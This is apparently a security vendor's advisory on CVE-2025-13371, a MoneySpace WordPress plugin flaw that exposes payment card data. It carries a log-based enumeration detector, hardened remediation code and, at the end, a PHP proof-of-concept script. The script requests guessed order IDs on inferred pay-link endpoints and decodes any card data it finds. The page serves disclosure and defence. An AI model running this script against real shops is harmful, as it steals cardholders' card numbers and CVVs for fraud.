Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-13371: Money Space <= 2.13.9 – Unauthenticated Sensitive Information Exposure (money-space)

Plugin money-space
Severity High (CVSS 8.6)
CWE 200
Vulnerable Version 2.13.9
Patched Version
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13371 (metadata-based):
This vulnerability is an unauthenticated sensitive information exposure in the MoneySpace WordPress plugin (versions <= 2.13.9). The plugin's 'mspaylink' endpoint embeds full payment card details, including PAN, cardholder name, expiry, and CVV, into publicly accessible inline JavaScript without authentication. The CVSS score of 8.6 (High) reflects the severe PCI-DSS violation and broad network attack surface.

Based on the CWE-200 classification and description, the root cause is a failure to implement proper access controls on a data retrieval endpoint. Atomic Edge research infers the plugin likely uses a WordPress hook (e.g., `add_shortcode`, `add_action`) to register a public-facing page or endpoint (e.g., `/mspaylink/`) that queries `post_meta` for a supplied `order_id`. The retrieved base64-encoded card data is then output directly inside a `<script>` tag. This analysis is inferred from the description; no source code confirms the exact function names.

Exploitation requires an attacker to send a simple HTTP GET request to the vulnerable endpoint, providing a valid or guessed `order_id` parameter. The endpoint is likely a custom page template or shortcode handler accessible at a path like `/?mspaylink={order_id}` or `/mspaylink/{order_id}`. No authentication, nonce, or authorization checks are present. The server response contains the sensitive card data within the HTML/JavaScript, which the attacker can extract and decode from base64.
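The request pattern described above leaves a recognisable trace in ordinary web-server logs: one client touching many different `order_id` values on the pay-link endpoint in a short span. The script below is an added example (not Atomic Edge's code and not part of the MoneySpace plugin) that flags such sweeps from combined-format access logs. The two URL shapes it recognises are the ones inferred in the analysis, not confirmed plugin routes, and the log lines are constructed for illustration; the function names are the example's own.

```php
<?php
// Added example: flag clients walking through order ids on the inferred pay-link endpoint.
// URL shapes follow the analysis above (inferred, not confirmed); log lines are constructed.
declare(strict_types=1);

const SAMPLE_ACCESS_LOG = <<<'LOG'
203.0.113.10 - - [05/Jan/2026:10:00:01 +0000] "GET /?mspaylink=101 HTTP/1.1" 200 5120 "-" "curl/8.4.0"
203.0.113.10 - - [05/Jan/2026:10:00:02 +0000] "GET /?mspaylink=102 HTTP/1.1" 200 5118 "-" "curl/8.4.0"
203.0.113.10 - - [05/Jan/2026:10:00:03 +0000] "GET /mspaylink/103/ HTTP/1.1" 200 5121 "-" "curl/8.4.0"
203.0.113.10 - - [05/Jan/2026:10:00:04 +0000] "GET /mspaylink/104/ HTTP/1.1" 404 312 "-" "curl/8.4.0"
198.51.100.7 - - [05/Jan/2026:10:05:00 +0000] "GET /mspaylink/555/ HTTP/1.1" 200 5130 "https://shop.example/checkout" "Mozilla/5.0"
198.51.100.7 - - [05/Jan/2026:10:06:00 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
LOG;

/** Parse a combined-log-format line; returns null for lines that do not match. */
function parse_access_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $when = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($when === false) {
        return null;
    }
    return ['ip' => $m[1], 'ts' => $when->getTimestamp(), 'method' => $m[3],
            'path' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

/** Order id from either inferred URL shape (query parameter or rewrite path), else null. */
function mspaylink_order_id(string $path): ?string
{
    if (preg_match('~^/\?mspaylink=([^&\s]+)~', $path, $m)) {
        return urldecode($m[1]);
    }
    if (preg_match('~^/mspaylink/([^/\s?]+)~', $path, $m)) {
        return urldecode($m[1]);
    }
    return null;
}

/**
 * Return [ip => distinct order ids] for clients that requested at least $threshold
 * distinct order ids on the pay-link endpoint inside any $window-second span.
 * Non-2xx responses still count: a 404 on a guessed id is part of the same sweep.
 */
function find_paylink_enumeration(string $log, int $threshold = 3, int $window = 300): array
{
    $byIp = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $hit = parse_access_line($line);
        if ($hit === null) {
            continue;
        }
        $id = mspaylink_order_id($hit['path']);
        if ($id === null) {
            continue;
        }
        $byIp[$hit['ip']][] = ['ts' => $hit['ts'], 'id' => $id];
    }

    $flagged = [];
    foreach ($byIp as $ip => $hits) {
        usort($hits, fn($a, $b) => $a['ts'] <=> $b['ts']);
        $n = count($hits);
        for ($start = 0; $start < $n; $start++) {
            $ids = [];
            for ($i = $start; $i < $n && $hits[$i]['ts'] - $hits[$start]['ts'] <= $window; $i++) {
                $ids[$hits[$i]['id']] = true;
            }
            if (count($ids) >= $threshold) {
                $flagged[$ip] = array_keys($ids);
                break;
            }
        }
    }
    return $flagged;
}

foreach (find_paylink_enumeration(SAMPLE_ACCESS_LOG) as $ip => $ids) {
    printf("[ALERT] %s requested %d distinct pay-link order ids: %s\n", $ip, count($ids), implode(', ', $ids));
}
```

On the sample above only `203.0.113.10` is flagged (four ids in four seconds); the single legitimate pay-link visit from `198.51.100.7` stays below the threshold. Access logs carry no session context, so a single authorised customer opening several of their own orders can also trip this rule; tuning the threshold against the shop's normal traffic, or correlating with the application's own request log that includes the user id, reduces that noise.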

Remediation requires implementing multiple security layers. The patched version (2.14.0) likely removed the card data from the public endpoint entirely. A proper fix involves: 1) deleting CVV data immediately after authorization, 2) never storing full PAN in `post_meta`, 3) implementing strict capability checks (e.g., `current_user_can('manage_options')`) on any data retrieval function, and 4) using WordPress transients or a dedicated PCI-compliant vault for any temporary storage, with encryption.
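Putting those four points into code, as an added example that is neither Atomic Edge's nor MoneySpace's: a hypothetical pay-link shortcode that stores only a gateway token and masked card reference in `post_meta`, keeps any transient payload encrypted and single-use, and refuses to render unless the caller is the order's owner or a shop administrator with a valid nonce. The `ms_example_*` function names, the `_ms_example_card_reference` meta key and the `ms_example_paylink` shortcode tag are assumptions; the WordPress functions called (`update_post_meta`, `set_transient`, `current_user_can`, `wp_verify_nonce`, `wp_json_encode`, and so on) are real core APIs.

```php
<?php
/*
 * Added example (hypothetical plugin code, not MoneySpace's): a hardened
 * pay-link handler implementing the four remediation points above.
 * Names prefixed ms_example_ are assumptions made for this example.
 */

// 1) + 2) Never persist PAN or CVV. Keep only what a receipt page needs.
function ms_example_store_card_reference(int $order_id, array $card): void
{
    $reference = [
        'token' => $card['gateway_token'],        // opaque token issued by the PSP
        'brand' => $card['brand'],
        'last4' => substr($card['pan'], -4),
        'exp'   => $card['exp_month'] . '/' . $card['exp_year'],
    ];
    update_post_meta($order_id, '_ms_example_card_reference', $reference);
    // The CVV is consumed by the authorization call and is never written anywhere.
}

// 4) Short-lived, encrypted, single-use transient for data that must survive a redirect.
function ms_example_key(): string
{
    // Key material derived from the site's own secrets; a dedicated KMS/vault key is better.
    return hash('sha256', AUTH_KEY . AUTH_SALT, true);
}

function ms_example_stash(int $order_id, array $payload, int $ttl = 300): void
{
    $iv  = random_bytes(12);
    $tag = '';
    $ct  = openssl_encrypt(wp_json_encode($payload), 'aes-256-gcm', ms_example_key(),
                           OPENSSL_RAW_DATA, $iv, $tag);
    set_transient('ms_example_paylink_' . $order_id, base64_encode($iv . $tag . $ct), $ttl);
}

function ms_example_unstash(int $order_id): ?array
{
    $raw = get_transient('ms_example_paylink_' . $order_id);
    delete_transient('ms_example_paylink_' . $order_id); // single use, even on failure
    if ($raw === false) {
        return null;
    }
    $blob = base64_decode($raw, true);
    if ($blob === false || strlen($blob) < 28) {
        return null;
    }
    $iv   = substr($blob, 0, 12);
    $tag  = substr($blob, 12, 16);
    $ct   = substr($blob, 28);
    $json = openssl_decrypt($ct, 'aes-256-gcm', ms_example_key(), OPENSSL_RAW_DATA, $iv, $tag);
    return $json === false ? null : json_decode($json, true);
}

// 3) Authorization on the retrieval path: the order's owner or a shop admin.
function ms_example_can_view_order(int $order_id): bool
{
    if (!is_user_logged_in()) {
        return false;
    }
    if (current_user_can('manage_options')) {
        return true;
    }
    $order = get_post($order_id);
    return $order !== null && (int) $order->post_author === get_current_user_id();
}

add_shortcode('ms_example_paylink', function ($atts) {
    $order_id = isset($_GET['order_id']) ? absint($_GET['order_id']) : 0;
    $nonce    = isset($_GET['_wpnonce']) ? sanitize_text_field(wp_unslash($_GET['_wpnonce'])) : '';
    if ($order_id === 0
        || !wp_verify_nonce($nonce, 'ms_example_paylink_' . $order_id)
        || !ms_example_can_view_order($order_id)) {
        return '<p>' . esc_html__('Not authorized.', 'ms-example') . '</p>';
    }
    $ref = get_post_meta($order_id, '_ms_example_card_reference', true);
    if (!is_array($ref)) {
        return '';
    }
    // Only masked fields reach the page, JSON-encoded with HTML-safe flags rather
    // than concatenated into the script body as raw text.
    $safe = ['brand' => $ref['brand'], 'last4' => $ref['last4'], 'exp' => $ref['exp']];
    return '<script>window.msExamplePayLink = '
         . wp_json_encode($safe, JSON_HEX_TAG | JSON_HEX_AMP) . ';</script>';
});
```

The link a customer receives would be generated with `wp_nonce_url(add_query_arg('order_id', $order_id, $page_url), 'ms_example_paylink_' . $order_id)`, so the nonce is bound to one order and expires on WordPress' normal nonce schedule. Even if the authorization check were bypassed, the page would only ever expose brand, last four digits and expiry, because nothing more was stored.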

The impact is severe financial data exposure. Attackers can harvest full credit card numbers, CVV codes, cardholder names, and expiration dates. This constitutes a direct PCI-DSS violation, enabling fraud and identity theft. The scope is changed (S:C in CVSS) because compromising one order exposes data from a completely different transaction, amplifying the breach. No integrity or availability impact occurs, but confidentiality is fully compromised.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13371 - Money Space <= 2.13.9 - Unauthenticated Sensitive Information Exposure
/**
 * Proof of Concept for CVE-2025-13371.
 * This script attempts to retrieve exposed payment card data from a vulnerable MoneySpace plugin endpoint.
 * The exact endpoint path is inferred from the description ('mspaylink page').
 * Two common WordPress patterns are tested: a query parameter and a URL rewrite endpoint.
 */

$target_url = 'https://example.com'; // CHANGE THIS TO THE TARGET SITE
$order_id   = '123'; // CHANGE THIS. Attacker would guess or enumerate IDs.

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only

// Test Pattern 1: Query parameter on homepage (common shortcode pattern)
$url_pattern1 = $target_url . '/?mspaylink=' . urlencode($order_id);
curl_setopt($ch, CURLOPT_URL, $url_pattern1);
$response1 = curl_exec($ch);

// Test Pattern 2: Dedicated endpoint (common page slug pattern)
$url_pattern2 = $target_url . '/mspaylink/' . urlencode($order_id) . '/';
curl_setopt($ch, CURLOPT_URL, $url_pattern2);
$response2 = curl_exec($ch);

curl_close($ch);

// Search for base64-encoded strings in script tags (common pattern for inline JS data)
function extract_card_data($html) {
    // Looks for base64_decode('...'); backslashes escape the parentheses, whitespace
    // class, quotes and the slash inside the single-quoted PCRE pattern.
    $pattern = '/base64_decode\(\s*["\']([A-Za-z0-9\/+=]+)["\']\s*\)/';
    if (preg_match_all($pattern, $html, $matches)) {
        return $matches[1]; // Return array of captured base64 strings
    }
    // Alternative: look for data attributes or JS variables containing base64
    $pattern2 = '/data-(?:card|payment)=\s*["\']([A-Za-z0-9\/+=]+)["\']/i';
    if (preg_match_all($pattern2, $html, $matches)) {
        return $matches[1];
    }
    return [];
}

$found_data = [];
$found_data['pattern1'] = extract_card_data($response1);
$found_data['pattern2'] = extract_card_data($response2);

// Output results
foreach ($found_data as $pattern => $b64_array) {
    if (!empty($b64_array)) {
        echo "[+] Potential card data found via $pattern:\n";
        foreach ($b64_array as $idx => $b64) {
            $decoded = base64_decode($b64, true); // strict mode rejects non-base64 input
            if ($decoded !== false) {
                echo "  [$idx] Base64: $b64\n";
                echo "      Decoded: $decoded\n";
            }
        }
    } else {
        echo "[-] No card data found via $pattern.\n";
    }
}

// If no data found, suggest manual review of response for other patterns
if (empty($found_data['pattern1']) && empty($found_data['pattern2'])) {
    echo "\n[!] No base64 patterns matched. Manual review recommended.\n";
    echo "    Search responses for 'card', 'cvv', 'pan', or 'expiry' in script tags.\n";
}
?>
